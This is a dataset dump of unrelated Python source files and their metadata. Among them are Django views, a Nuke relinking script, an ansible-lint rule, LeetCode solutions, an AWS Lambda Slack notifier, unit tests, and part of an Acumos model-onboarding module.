\"\"\"\n\n # Sheet based data\n chars_sheet = validate_characters(request.user, calculate_character_access_mask(['CharacterSheet']))\n sheet_data = []\n\n for char in chars_sheet:\n sheet_data.append({'char': char, 'next_update': APITimer.objects.get(character_id=char.id,\n apisheet='CharacterSheet').nextupdate})\n\n # Get all WalletJournal/WalletTransactions Chars\n market_chars = validate_characters(request.user, calculate_character_access_mask(['WalletJournal', 'WalletTransactions']))\n\n # Collect stats\n month = calculate_profit_stats(market_chars, 30)\n week = calculate_profit_stats(market_chars, 7)\n day = calculate_profit_stats(market_chars, 1)\n\n last_ten_sales = MarketTransaction.objects.filter(character__in=market_chars, is_bid=False).extra(select={'value': \"price * quantity\"}).order_by('-date')[:10]\n\n rcontext = RequestContext(request, {'sheet_data': sheet_data,\n 'month': month,\n 'week': week,\n 'day': day,\n 'last_ten_sales': last_ten_sales})\n\n return render_to_response('dashboard.haml', rcontext)\n\n\n@login_required\ndef journal_json(request):\n # Get all chars with journal permissions\n chars = validate_characters(request.user, calculate_character_access_mask(['WalletJournal']))\n\n wallet_series = {}\n\n # Append wallet history of all characters to dict\n for char in chars:\n series = []\n journal = JournalEntry.objects.filter(character=char).order_by('date')\n\n for point in journal:\n series.append([int(time.mktime(point.date.timetuple())) * 1000, point.balance])\n\n # If there aren't any journal entries, catch the resulting AssertionError and return empty list\n try:\n # Add current balance in the end for a more consistent look\n series.append([(int(time.mktime(datetime.datetime.utcnow().timetuple())) * 1000), journal[len(journal) - 1].balance])\n except AssertionError:\n series = []\n\n wallet_series[char.name] = series\n\n json = simplejson.dumps(wallet_series)\n\n # Return JSON without using any template\n return HttpResponse(json, mimetype='application/json')\n\n\n@login_required\ndef char_sheet(request, char_id):\n\n try:\n char = Character.objects.get(user=request.user, id=char_id)\n except:\n messages.error(request, 'There is no such character in our database.')\n return HttpResponseRedirect(reverse('home'))\n\n # Get skills\n skills = CharSkill.objects.filter(character_id=char.id).order_by('skill__group')\n\n skill_points = CharSkill.objects.filter(character_id=char.id).aggregate(Sum('skillpoints'))['skillpoints__sum']\n\n rcontext = RequestContext(request, {'char': char, 'skills': skills, 'skill_points': skill_points})\n return render_to_response('_char_sheet.haml', rcontext)\n","sub_path":"webapp/element43/apps/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"220295600","text":"import nuke\nimport os\nimport fnmatch\nimport shutil\n\ndef fixReadError():\n\n basePath = nuke.getFilename('Select Dir', \" \", type='open')\n\n if basePath != None:\n path = os.path.join(basePath)\n for path, dirs, files in os.walk(path):\n subpath = path\n missingRead = \"\"\n for i in nuke.allNodes():\n if i.Class()=='Read':\n if i.error() == True:\n oldpath = i['file'].value()\n oldname = os.path.basename(oldpath)\n fileExt = oldname[-3:]\n fileName = oldname[:-4]\n\n if fileName.find(\"%d\") != -1:\n newfindname = fileName.replace(\"%d\", \"*\") and fileName.replace(\"%d\", \"*\")\n if fileName.find(\"%02d\") != -1:\n newfindname = fileName.replace(\"%d\", \"*\") and fileName.replace(\"%02d\", \"*\")\n if fileName.find(\"%03d\") != -1:\n newfindname = fileName.replace(\"%d\", \"*\") and fileName.replace(\"%03d\", \"*\")\n if fileName.find(\"%04d\") != -1:\n newfindname = fileName.replace(\"%d\", \"*\") and fileName.replace(\"%04d\", \"*\")\n if fileName.find(\"%05d\") != -1:\n newfindname = fileName.replace(\"%d\", \"*\") and fileName.replace(\"%05d\", \"*\")\n if fileName.find(\"%06d\") != -1:\n newfindname = fileName.replace(\"%d\", \"*\") and fileName.replace(\"%06d\", \"*\")\n findFile = newfindname + \".\" + fileExt\n\n path = os.path.join(basePath)\n for path, dirs, files in os.walk(path):\n subpath = path\n for file in os.listdir(subpath):\n if fnmatch.fnmatch(file, findFile):\n reformatPath = subpath.replace(\"\\\\\",\"/\")\n i['file'].setValue(reformatPath +'/'+ oldname)\n\n if i.error() == False:\n missingRead = i.name() + \" - \" + oldname + \" - \" + \" Found Successfully!\" + \"\\n\" + missingRead\n else:\n missingRead = i.name() + \" - \" + oldname + \" - \" + \" Not Fpund!\" + \"\\n\" + missingRead\n else:\n if missingRead == \"\":\n missingRead = \"You don't have any readNode with error!.\"\n else:\n missingRead = \"No folder was selected!\"\n nuke.message(missingRead)\n\nfixReadError()","sub_path":"333_nuke/__exercises/Nuke_Scripting_for_Pipeline_TD/005_Prakticheskij_blok_1/fixReadsMy.py","file_name":"fixReadsMy.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"534326545","text":"#\n# (c) Copyright 2016 Hewlett Packard Enterprise Development LP\n# (c) Copyright 2017 SUSE LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport re\nimport sys\n\nfrom ansiblelint import AnsibleLintRule\n\n\nclass ArdanaModeOctalOrSymbolicRule(AnsibleLintRule):\n id = 'ARDANAANSIBLE0011'\n shortdesc = 'mode must be symbolic, variable or a 4-digit octal'\n description = ('mode when specified for file, copy and template tasks, '\n 'must be symbolic (e.g. \"u=rw,g=r,o=r\"), '\n 'a variable (e.g. \"{{ mode }}\") '\n 'or a 4-digit octal (e.g. 0700, \"0700\")')\n tags = ['formatting']\n _commands = ['file', 'copy', 'template']\n _ignore_states = ['absent', 'link']\n\n @staticmethod\n def validate_mode(mode):\n # convert symbolic to octal\n def rwx_to_oct(string):\n retval = 0\n for match, decimal in zip('rwx', [4, 2, 1]):\n retval += decimal if match in string else 0\n return retval\n matched = re.match(\"u=([rwx]+),g=([rwx]+),o=([rwx]+)\", mode)\n if matched:\n mode = \"0\" + ''.join(str(rwx_to_oct(i)) for i in matched.groups())\n\n matched = re.match(\"0([4567])([04567])([04567])\", mode)\n if not matched:\n return True\n user, group, other = (int(i) for i in matched.groups())\n\n if user < group or group < other:\n return True\n return False\n\n def matchtask(self, file, task):\n if sys.modules['ardana_noqa'].skip_match(file):\n return False\n action = task[\"action\"]\n if action[\"module\"] in self._commands:\n if action.get(\"state\") in self._ignore_states:\n return False\n if \"mode\" not in action:\n return True\n mode = action.get(\"mode\")\n if isinstance(mode, int):\n mode = \"%04o\" % mode\n if not isinstance(mode, str):\n return True\n if mode.startswith(\"{{\"):\n return False\n return self.validate_mode(mode)\n\n\n# ansible-lint expects the filename and class name to match\n# Python style expects filenames to be all lowercase\n# Python style expects classnames to be CamelCase\n# Resolution: trick ansible lint with this class\nclass ardana_mode_octal_or_symbolic_rule(ArdanaModeOctalOrSymbolicRule):\n pass\n","sub_path":"lint_rules/ardana_mode_octal_or_symbolic_rule.py","file_name":"ardana_mode_octal_or_symbolic_rule.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"10820437","text":"class Solution(object):\n def reverse(self, x):\n if x < 0: return -self.reverse(-x);\n result = 0;\n while x > 0:\n result = result * 10 + x % 10;\n x = x / 10;\n return 0 if result > 0x7FFFFFFF else result\n\ns = Solution()\nprint(s.reverse(-10100))\n","sub_path":"7. Reverse Integer/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"542741422","text":"import os\nimport json\nimport http.client\n\nslack_host = os.environ.get(\"SLACK_HOST\")\nslack_webhook_endpoint = os.environ.get(\"SLACK_WEBHOOK_ENDPOINT\")\nslack_channel = os.environ.get(\"SLACK_CHANNEL\")\nheaders = {\n 'Content-Type': 'application/json',\n}\n\n\ndef call_slack_webhook(topic, title, message, sender='Notice from AWS'):\n connection = http.client.HTTPSConnection(slack_host)\n\n # TODO: make more generic/customisable\n post_data = {\n \"channel\": slack_channel,\n \"username\": sender,\n \"text\": \"*\" + topic + \"*\",\n \"icon_emoji\": \":aws_logo:\",\n \"attachments\": [{\n \"title\": title,\n \"text\": message\n }]\n }\n\n connection.request(\"POST\", slack_webhook_endpoint, json.dumps(post_data), headers)\n response = connection.getresponse()\n connection.close()\n\n return response.status\n\n\ndef lambda_handler(event, context):\n # Log the received event\n print(f\"Received event: {json.dumps(event, indent=2)}\")\n\n # set Slack message defaults in case we cannot extract more meaningful data\n # at least this should produce a Slack notification we can follow up on\n slack_sender = \"\"\n slack_topic = \"Unknown\"\n slack_title = \"Unknown\"\n slack_message = \"Unknown\"\n\n # check what kind of event we have recieved\n if event.get('topic'):\n # Custom event for Slack\n print(\"Custom Slack event\")\n slack_topic = event['topic']\n slack_title = event['title'] if event.get('title') else \"\"\n slack_message = event['message'] if event.get('message') else \"\"\n elif event.get('Records'):\n # SNS notification\n print(\"Received event records. Looking at first record only\")\n record = event['Records'][0] # assume we only have one record TODO: check for situations where we can have more\n if record.get('EventSource') or record.get('eventSource'):\n slack_sender = f\"Message from {record['EventSource']}{record['eventSource']}\"\n if record.get('Sns'):\n print(\"Extracted SNS record\")\n sns_record = record.get('Sns')\n topic_arn = sns_record['TopicArn'] if sns_record.get('TopicArn') else \"\"\n slack_topic = f\"SNS topic: {topic_arn}\"\n if sns_record.get('Message'):\n print(f\"Message: {sns_record['Message']}\")\n message = json.loads(sns_record['Message'])\n if message.get('AlarmName'):\n slack_title = f\"Alarm {message['AlarmName']} changed to {message['NewStateValue']}\"\n slack_message = message['AlarmDescription'] if message.get('AlarmDescription') else \"\"\n elif 'Stratus' in topic_arn:\n # There can be GDS and TES notifications\n # TODO: check differences between notifcations\n slack_title = message['name'] if message.get('name') else \"\"\n stratus_status = message['status'] if message.get('status') else \"\"\n stratus_type = sns_record['MessageAttributes']['type']['Value']\n stratus_action = sns_record['MessageAttributes']['action']['Value']\n slack_message = F\"A {stratus_type} was {stratus_action}\"\n if stratus_status:\n slack_message += f\": Status {stratus_status}\"\n else:\n slack_message = \"Unrecognised SNS notification format\"\n else:\n print(\"SNS record does not seem to contain a message\")\n elif record.get('s3'):\n print(\"Got S3 event\")\n else:\n print(\"No 'Sns' record found\")\n elif event.get('source'):\n print(\"Regular CloudWatch event\")\n # Regular AWS event, need to extract useful information\n event_source = event['source']\n event_detail_type = event['detail-type'] if event.get('detail-type') else \"\"\n event_id = event['id'] if event.get('id') else \"\"\n event_account = event['account'] if event.get('account') else \"\"\n event_resources = event['resources'] if event.get('resources') else []\n event_resources_names = []\n for event_res in event_resources:\n event_resources_names.append(event_res.rpartition(\":\")[2])\n slack_topic = f\"AWS event from {event_source} in account {event_account}\"\n slack_title = f\"{event_detail_type} (id:{event_id}) for {event_resources_names}\"\n # event details are event specific, we just dump them into the message\n slack_message = json.dumps(event['detail'])\n else:\n slack_topic = \"Unknown event source\"\n slack_title = \"Don't know how to handle this event\"\n slack_message = json.dumps(event, indent=2)\n\n # Forward the data to Slack\n try:\n print(f\"Sending Slack message with topic ({slack_topic}), title ({slack_title}) and message ({slack_message})\")\n if slack_sender != \"\":\n response = call_slack_webhook(slack_topic, slack_title, slack_message, slack_sender)\n else:\n response = call_slack_webhook(slack_topic, slack_title, slack_message)\n print(f\"Response status: {response}\")\n return event\n\n except Exception as e:\n print(e)\n","sub_path":"terraform/stacks/bootstrap/lambdas/notify_slack.py","file_name":"notify_slack.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"5230020","text":"import pandas as pd\n\nratings = pd.read_csv('../../assets/ml-latest-small/ratings.csv', usecols=range(3), encoding='ISO-8859-1')\nmovies = pd.read_csv('../../assets/ml-latest-small/movies.csv', usecols=range(2), encoding='ISO-8859-1')\n\n# print(ratings.head())\n# print(movies.head())\n\nratings = pd.merge(movies, ratings)\n# print(ratings.tail(10))\n\nmovieRatings = ratings.pivot_table(index=['userId'], columns=['title'], values='rating')\n# print(movieRatings.tail(10))\n\ncurrMovieRatings = movieRatings['GoldenEye (1995)']\ncurrMovieRatings = currMovieRatings.dropna() #drop NAN values\n# print(currMovieRatings.head(10))\n\nsimilarMovies = movieRatings.corrwith(currMovieRatings) #getting correlation with other movies\nsimilarMovies = similarMovies.dropna()\n\ndf = pd.DataFrame(similarMovies)\n# print(df.head(10))\n\n#sort the results with similarity score\nsimilarMovies = similarMovies.sort_values(ascending=False)\nprint(similarMovies.head(20))\n\n#how many ratings exits for each movie\nimport numpy as np\nmovieStats = ratings.groupby('title').agg({'rating': [np.size, np.mean]})\n\n#remove movies which are only rated by very few people\npopularMovies = movieStats['rating']['size'] >= 120\n# print(popularMovies.head(10))\n\nprint(movieStats[popularMovies])\n\nsortedPopular = movieStats[popularMovies].sort_values([('rating', 'mean')], ascending=False)\n# print(sortedPopular.head(10))\n\nsimilarmoviesdf = pd.DataFrame(similarMovies, columns=['similarity'])\nprint(similarmoviesdf)\n\ndf = movieStats[popularMovies].join(similarmoviesdf)\ndf = df.sort_values(['similarity'], ascending=False)\nprint(df.head(10))\n\n","sub_path":"MachineLearning/RecommenderSystems/MoviesRecommender.py","file_name":"MoviesRecommender.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"11306480","text":"# -*- mode: python -*-\n\nblock_cipher = None\n\n\na = Analysis(['main6.py'],\n pathex=['C:\\\\\\\\Users\\\\\\\\J7LI\\\\\\\\OneDrive - Nokia\\\\\\\\python\\\\\\\\python\\\\\\\\mypy37-32\\\\\\\\SRAN_Reading\\\\\\\\SRAN_Reading_ToolV2\\\\\\\\TDD_mod', 'C:\\\\\\\\Users\\\\\\\\J7LI\\\\\\\\OneDrive - Nokia\\\\\\\\python\\\\\\\\python\\\\\\\\mypy37-32\\\\\\\\SRAN_Reading\\\\\\\\SRAN_Reading_ToolV2\\\\\\\\SRAN_mod', 'C:\\\\Users\\\\J7LI\\\\OneDrive - Nokia\\\\python\\\\python\\\\mypy37-32\\\\SRAN_Reading\\\\SRAN_Reading_ToolV2'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='main6',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n runtime_tmpdir=None,\n console=False , icon='icon\\\\icon.ico')\n","sub_path":"main6.spec","file_name":"main6.spec","file_ext":"spec","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"292884197","text":"# Advanced Programming in Python -- Lesson 7 Assignment 1\n# Jason Virtue\n# Start Date 2/23/2020\n\n#Original code set with multiple threads writing to stdout and with locks to prevent race condition\nimport random\nimport sys\nimport threading\nimport time\n\n#Lock condition to lock each thread till it completes\nlock = threading.Lock()\n\n#Locks to prevent race condition. STDOUT Function. Sleep condition causing unequal function durations\ndef write():\n lock.acquire()\n sys.stdout.write(\"%s writing..\" % threading.current_thread().name)\n time.sleep(random.random())\n sys.stdout.write(\"..done\\n\")\n lock.release()\n\n#Run function 50 times with a fixed sleep timeframe\nthreads = []\nfor i in range(50):\n thread = threading.Thread(target=write)\n thread.daemon = True # allow ctrl-c to end\n thread.start()\n threads.append(thread)\n time.sleep(.01)\n\n# Now join() them all so the program won't terminate early\n# required because these are all daemon threads\nfor thread in threads:\n thread.join()\n\n","sub_path":"students/j_virtue/lesson07/activity/stdout_writer_solution.py","file_name":"stdout_writer_solution.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"498569087","text":"# encoding = 'utf-8'\n\nclass Solution(object):\n def canPlaceFlowers(self, flowerbed, n):\n \"\"\"\n :type flowerbed: List[int]\n :type n: int\n :rtype: bool\n \"\"\"\n for i in range(len(flowerbed)):\n if flowerbed[i]==0 and (i==0 or flowerbed[i-1]==0) and (i==len(flowerbed)-1 or flowerbed[i+1]==0):\n flowerbed[i] = 1\n n -=1\n\n return n<=0\n\nflowerbed = [1,0,0,0,0,1]\nn = 2\n\ntest = Solution()\nresult = test.canPlaceFlowers(flowerbed,n)\nprint(result)\n","sub_path":"20181007-605-Can_Place_Flowers.py","file_name":"20181007-605-Can_Place_Flowers.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"480625411","text":"while True:\n PaqueteLibraA = float (input (\"Precio por libra paquete A: \"))\n PorcentajeMagroA = float (input (\"Porcentaje magro del paquete A: \"))\n PaqueteLibraB = float (input (\"Precio por libra paquete B: \"))\n PorcentajeMagroB = float (input (\"Porcentaje magro del paquete B: \"))\n CalcularA = PaqueteLibraA/PorcentajeMagroA\n CalcularB = PaqueteLibraB/PorcentajeMagroB\n print(\"Costo de carne Paquete A: \",CalcularA)\n print(\"Costo de carne Paquete B: \",CalcularB)\n if CalcularA > CalcularB:\n print(\"El paquete B es el mejor\")\n print(\"-----------------------------\")\n else:\n print(\"El paquete A es el mejor\")\n print(\"-----------------------------\")\n","sub_path":"Leccion 5/Ejercicio3.py","file_name":"Ejercicio3.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"255771476","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom symposion.conference.models import Conference, Section\nfrom symposion.proposals.models import ProposalBase\nfrom symposion.speakers.models import Speaker\nfrom symposion.schedule.models import Presentation\nfrom symposion.schedule.tests.factories import ProposalKindFactory\n\n\nclass UserlessSpeakersTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n # Create two speakers - one with a User attached, and one without.\n user_model = get_user_model()\n user = user_model.objects.create(\n username=\"test\",\n email=\"example@example.com\",\n first_name=\"Test\",\n last_name=\"User\",\n )\n primary_speaker = Speaker.objects.create(user=user, name=\"Speaker #1\")\n cls.second_speaker = Speaker.objects.create(\n user=None, name=\"Speaker #2\"\n )\n\n # A Presentation needs a ProposalBase, and\n # a ProposalBase needs a ProposalKind, and\n # a ProposalKind needs a Section, and\n # A Section needs a Conference, and\n # the developer who wrote this test case needs a hug!\n conference = Conference.objects.create(title=\"Conference\")\n section = Section.objects.create(\n conference=conference, name=\"Section\", slug=\"section\"\n )\n proposal_kind = ProposalKindFactory.create(section=section)\n proposal_base = ProposalBase.objects.create(\n title=\"Proposal\",\n description=\"...\",\n abstract=\"...\",\n speaker=primary_speaker,\n kind=proposal_kind,\n )\n cls.presentation = Presentation.objects.create(\n title=\"Presentation\",\n description=\"...\",\n abstract=\"...\",\n speaker=primary_speaker,\n proposal_base=proposal_base,\n section=section,\n )\n cls.presentation.additional_speakers.add(cls.second_speaker)\n\n def test_userless_speaker_name(self):\n \"\"\"Test that userless speakers will display their names.\"\"\"\n self.assertEqual(str(self.second_speaker), self.second_speaker.name)\n\n def test_presentation_userless_speakers(self):\n \"\"\"Test that presentation speaker counts include all speakers.\"\"\"\n # A Presentation's speakers() method is a generator of all\n # associated speakers who have accepted their association.\n # If it is properly returning all accepted speakers,\n # the result should be one (not two).\n self.assertEqual(len(list(self.presentation.speakers())), 1)\n","sub_path":"symposion/schedule/tests/test_userless_speakers.py","file_name":"test_userless_speakers.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"415151955","text":"import sys\nimport os\nimport numpy\n\nfrom PyQt5.Qt import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\n\nfrom WorkerThread import WorkerThread\nfrom PLTWidget import PLTWidget\nfrom Utility import fitness\n\nclass GUI(QMainWindow):\n def __init__(self):\n super(GUI, self).__init__()\n uic.loadUi('ui.ui', self)\n self.start_button.clicked.connect(self.start)\n self.stop_button.clicked.connect(self.stop)\n self.worker_thread = None\n self.fitness_list = []\n self.mean_list = []\n self.std_list = []\n self.pltwidget.canvas.draw()\n self.show()\n\n def init_textedits(self):\n self.solution.setEnabled(False)\n\n def start(self):\n self.fitness_list = []\n self.mean_list = []\n self.std_list = []\n try:\n self.finished.setText(\"\")\n self.best.setText(\"Best fitness so far:\")\n self.solution.setText(\"\")\n particle_size = int(self.particle_edit.toPlainText())\n iterations = int(self.iterations_edit.toPlainText())\n swarm_size = int(self.swarm_edit.toPlainText())\n neighbourhoods = int(self.neighbourhood_edit.toPlainText())\n w = float(self.w_edit.toPlainText())\n c1 = float(self.c1_edit.toPlainText())\n c2 = float(self.c2_edit.toPlainText())\n self.thread = WorkerThread(30, iterations, swarm_size, neighbourhoods, particle_size, w, c1, c2)\n self.thread.run_finished.connect(self.update_graph)\n self.thread.start()\n except ValueError:\n pass\n \n def stop(self):\n self.thread.terminate()\n\n def update_graph(self, matrix):\n new_best = fitness(matrix.best)\n self.fitness_list.append(new_best)\n self.mean_list.append(numpy.average(self.fitness_list))\n self.std_list.append(numpy.std(self.fitness_list))\n self.pltwidget.canvas.axes.clear()\n self.pltwidget.canvas.axes.plot(self.fitness_list)\n self.pltwidget.canvas.axes.plot(self.mean_list)\n self.pltwidget.canvas.axes.plot(self.std_list)\n self.pltwidget.canvas.axes.legend(('Fitness', 'Mean', 'Standard Deviation'), loc='upper right')\n best = max(self.fitness_list)\n if(new_best >= best):\n self.solution.setText(str(matrix.best))\n self.best.setText(\"Best fitness so far: \" + str(new_best))\n self.pltwidget.canvas.draw()\n if len(self.fitness_list) == 30:\n self.finished.setText(\"Finished!\")","sub_path":"Artificial Intelligence/Lab4/Lab 4 - PSO - Dombi Norbert - 923-2/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"419605657","text":"# Copyright 2017 Google LLC All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport mock\n\n\nclass TestBaseTransaction(unittest.TestCase):\n @staticmethod\n def _get_target_class():\n from google.cloud.firestore_v1.base_transaction import BaseTransaction\n\n return BaseTransaction\n\n def _make_one(self, *args, **kwargs):\n klass = self._get_target_class()\n return klass(*args, **kwargs)\n\n def test_constructor_defaults(self):\n from google.cloud.firestore_v1.transaction import MAX_ATTEMPTS\n\n transaction = self._make_one()\n self.assertEqual(transaction._max_attempts, MAX_ATTEMPTS)\n self.assertFalse(transaction._read_only)\n self.assertIsNone(transaction._id)\n\n def test_constructor_explicit(self):\n transaction = self._make_one(max_attempts=10, read_only=True)\n self.assertEqual(transaction._max_attempts, 10)\n self.assertTrue(transaction._read_only)\n self.assertIsNone(transaction._id)\n\n def test__options_protobuf_read_only(self):\n from google.cloud.firestore_v1.types import common\n\n transaction = self._make_one(read_only=True)\n options_pb = transaction._options_protobuf(None)\n expected_pb = common.TransactionOptions(\n read_only=common.TransactionOptions.ReadOnly()\n )\n self.assertEqual(options_pb, expected_pb)\n\n def test__options_protobuf_read_only_retry(self):\n from google.cloud.firestore_v1.base_transaction import _CANT_RETRY_READ_ONLY\n\n transaction = self._make_one(read_only=True)\n retry_id = b\"illuminate\"\n\n with self.assertRaises(ValueError) as exc_info:\n transaction._options_protobuf(retry_id)\n\n self.assertEqual(exc_info.exception.args, (_CANT_RETRY_READ_ONLY,))\n\n def test__options_protobuf_read_write(self):\n transaction = self._make_one()\n options_pb = transaction._options_protobuf(None)\n self.assertIsNone(options_pb)\n\n def test__options_protobuf_on_retry(self):\n from google.cloud.firestore_v1.types import common\n\n transaction = self._make_one()\n retry_id = b\"hocus-pocus\"\n options_pb = transaction._options_protobuf(retry_id)\n expected_pb = common.TransactionOptions(\n read_write=common.TransactionOptions.ReadWrite(retry_transaction=retry_id)\n )\n self.assertEqual(options_pb, expected_pb)\n\n def test_in_progress_property(self):\n transaction = self._make_one()\n self.assertFalse(transaction.in_progress)\n transaction._id = b\"not-none-bites\"\n self.assertTrue(transaction.in_progress)\n\n def test_id_property(self):\n transaction = self._make_one()\n transaction._id = mock.sentinel.eye_dee\n self.assertIs(transaction.id, mock.sentinel.eye_dee)\n\n\nclass Test_Transactional(unittest.TestCase):\n @staticmethod\n def _get_target_class():\n from google.cloud.firestore_v1.base_transaction import _BaseTransactional\n\n return _BaseTransactional\n\n def _make_one(self, *args, **kwargs):\n klass = self._get_target_class()\n return klass(*args, **kwargs)\n\n def test_constructor(self):\n wrapped = self._make_one(mock.sentinel.callable_)\n self.assertIs(wrapped.to_wrap, mock.sentinel.callable_)\n self.assertIsNone(wrapped.current_id)\n self.assertIsNone(wrapped.retry_id)\n\n def test__reset(self):\n wrapped = self._make_one(mock.sentinel.callable_)\n wrapped.current_id = b\"not-none\"\n wrapped.retry_id = b\"also-not\"\n\n ret_val = wrapped._reset()\n self.assertIsNone(ret_val)\n\n self.assertIsNone(wrapped.current_id)\n self.assertIsNone(wrapped.retry_id)\n","sub_path":"tests/unit/v1/test_base_transaction.py","file_name":"test_base_transaction.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"424277358","text":"# -*- coding: utf-8 -*-\n# ===============LICENSE_START=======================================================\n# Acumos Apache-2.0\n# ===================================================================================\n# Copyright (C) 2017-2018 AT&T Intellectual Property & Tech Mahindra. All rights reserved.\n# ===================================================================================\n# This Acumos software file is distributed by AT&T and Tech Mahindra\n# under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# This file is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============LICENSE_END=========================================================\n\"\"\"\nProvides a Acumos session for pushing and dumping models\n\"\"\"\nimport random\nimport string\nimport shutil\nimport json\nimport requests\nimport fnmatch\nimport warnings\nfrom contextlib import contextmanager, ExitStack\nfrom tempfile import TemporaryDirectory\nfrom os import walk, mkdir\nfrom os.path import extsep, exists, abspath, dirname, isdir, isfile, expanduser, relpath, basename, join as path_join\nfrom pathlib import Path\nfrom collections import namedtuple\nfrom glob import glob\n\nfrom acumos_cpp.metadata import Options\nfrom acumos_cpp.utils import dump_artifact\nfrom acumos_cpp.exc import AcumosError\nfrom acumos_cpp.logging import get_logger\nfrom acumos_cpp.auth import get_jwt, clear_jwt\n\nlogger = get_logger(__name__)\n\n_LICENSE_NAME = 'license.json'\n_PYEXT = \"{}py\".format(extsep)\n_PYGLOB = \"*{}\".format(_PYEXT)\n\n_ServerResponse = namedtuple('ServerResponse', 'status_code reason text')\n_DEPR_MSG = ('Usage of `auth_api` is deprecated; provide an onboarding token instead. '\n 'See https://pypi.org/project/acumos/ for more information.')\n\n\nclass AcumosSession(object):\n '''\n A session that enables onboarding models to Acumos\n\n Parameters\n ----------\n push_api : str\n The full URL to the Acumos onboarding server upload API\n auth_api : str\n The full URL to the Acumos onboarding server authentication API.\n\n .. deprecated:: 0.7.1\n Users should provide an onboarding token instead of username and password credentials.\n '''\n\n def __init__(self, push_api=None, auth_api=None):\n self.push_api = push_api\n self.auth_api = auth_api\n\n if auth_api is not None:\n warnings.warn(_DEPR_MSG, DeprecationWarning, stacklevel=2)\n\n\ndef _validate_options(options):\n '''Validates and returns an `Options` object'''\n if options is None:\n options = Options()\n elif not isinstance(options, Options):\n raise AcumosError('The `options` parameter must be of type `acumos.metadata.Options`')\n return options\n\n\ndef _assert_valid_api(param, api, required):\n '''Raises AcumosError if an api is invalid'''\n if api is None:\n if required:\n raise AcumosError(\"AcumosSession.push requires that the API for `{}` be provided\".format(param))\n else:\n if not api.startswith('https'):\n logger.warning(\n \"Provided `{}` API {} does not begin with 'https'. Your password and token are visible in plaintext!\".format(\n param, api))\n\n\ndef _push_model(dump_dir, push_api, auth_api, options, max_tries=2, extra_headers=None):\n '''Pushes a model to the Acumos server'''\n with ExitStack() as stack:\n model = stack.enter_context(open(path_join(dump_dir, 'model.zip'), 'rb'))\n meta = stack.enter_context(open(path_join(dump_dir, 'metadata.json')))\n proto = stack.enter_context(open(path_join(dump_dir, 'model.proto')))\n\n files = {'model': ('model.zip', model, 'application/zip'),\n 'metadata': ('metadata.json', meta, 'application/json'),\n 'schema': ('model.proto', proto, 'text/plain')}\n\n # include a license if one is provided\n if options.license is not None:\n _add_license(dump_dir, options.license)\n license = stack.enter_context(open(path_join(dump_dir, _LICENSE_NAME)))\n files['license'] = (_LICENSE_NAME, license, 'application/json')\n\n tries = 1\n _post_model(files, push_api, auth_api, tries, max_tries, extra_headers, options)\n\n\ndef _add_license(rootdir, license_str):\n '''Adds a license file to the model root directory'''\n license_dst = path_join(rootdir, 